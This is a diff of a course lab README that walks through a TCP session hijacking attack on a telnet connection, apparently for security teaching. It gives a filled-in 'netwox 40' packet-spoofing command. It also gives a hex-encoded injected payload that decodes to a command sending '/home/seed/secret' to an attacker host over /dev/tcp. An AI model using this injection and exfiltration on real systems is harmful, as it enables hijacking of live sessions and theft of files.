jidongbsu/cs333/labs/tcphijack/README.md

 5. attacker stops wireshark capturing, and navigates to the latest packet sent from the client to the server.

+This image shows the ip addresses, port numbers, sequence number, acknowledgment number.
 ![alt text](lab-tcp-hijack-capture1.png "Lab tcp hijack latest tcp capture - part 1")

+This image shows the window size - still the same packet.
 ![alt text](lab-tcp-hijack-capture2.png "Lab tcp hijack latest tcp capture - part 2")

+This image shows the ttl attribute - still the same packet.
 ![alt text](lab-tcp-hijack-capture3.png "Lab tcp hijack latest tcp capture - part 3")

 6. the above packet provides the information which the attacker needs to know in order to perform the tcp session hijacking attack. now, the attacker, mimicking the **client**, needs to use the *netwox 40* command to inject a telnet command.
-The command should be in this format: # sudo netwox 40 --ip4-src *source_ip* --ip4-dst *destination_ip* --tcp-src *source_port* --tcp-dst *destination_port* --tcp-seqnum *sequence_number* --ip4-ttl *ttl_value* --tcp-window *window_size* --tcp-ack --tcp-acknum *acknowledgment_number* --tcp-data "putyourdatahere,in hex format".
+The netwox command should be in this format: # sudo netwox 40 --ip4-src *source_ip* --ip4-dst *destination_ip* --tcp-src *source_port* --tcp-dst *destination_port* --tcp-seqnum *sequence_number* --ip4-ttl *ttl_value* --tcp-window *window_size* --tcp-ack --tcp-acknum *acknowledgment_number* --tcp-data "putyourdatahere,in hex format".
 Remember to replace these italic texts with information captured in wireshark.
 To run the command, the attacker opens a terminal window, types the *netwox 40* command, and press enter.

 **Note**: because the attacker is mimicking the client, thus the source ip address needs to be the client's IP address; from the captured latest packet, we can see the sequence number is *2523450797*, the acknowledgment number is *311613137*; the source port (in this example) is 57502, the destination port is 23. the tcp window size (in this example) is 245, the time to live (ttl) value is 64.
 The tcp data we can use is: "0d20636174202f686f6d652f736565642f736563726574203e202f6465762f7463702f61747461636b65725f69702f39303930200d".